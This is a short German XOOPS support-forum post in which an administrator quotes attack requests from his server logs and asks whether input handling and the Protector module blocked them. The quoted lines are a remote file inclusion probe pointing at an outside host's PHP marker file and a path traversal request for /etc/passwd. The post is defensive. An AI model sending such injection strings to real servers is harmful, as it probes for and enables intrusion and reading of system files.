MyXoops Forum

Forum - myXOOPS German Support

7 - 4 = ?  
Geben Sie das Ergebnis der Berechnung ein
Sie haben max. 10 Versuche.
 
* = Erforderlich

SQL-Injection - Interpretation?

Betreff: SQL-Injection - Interpretation?
von frankblack am 11.12.2009 15:45:03

Ich beobachte seit ein paar Tagen folgende Anfragen in Protector und in den Server-Logs:
GET /artikel/item.php?itemid=372///?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/one.txt???
Der Code in dieser Textdatei sieht folgendermaßen aus:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Frage A: itemid wird mit intval behandelt. Reicht das? Frage B: Hat Protector diesen Angriff abgewehrt? Ich habe bei Protector immer ein flaues Gefühl, weil die Meldungen nicht besonders aussagekräftig sind. Hmmm, da scheint nur jemand wild am Spekulieren zu sein, siehe auch:
GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
oder doch nicht?

Aktuell aus dem Forum

Forum Thema Antworten Views Letzter Beitrag
Modulentwicklung New Xoops Xcreate Module 0 4085 26.11.2025 15:22
efkan Gehe zum letzten Beitrag
Modulentwicklung XOOPS Custom Field Module 1 1557 24.11.2025 11:21
Goffy Gehe zum letzten Beitrag
Posts | Themen | Foren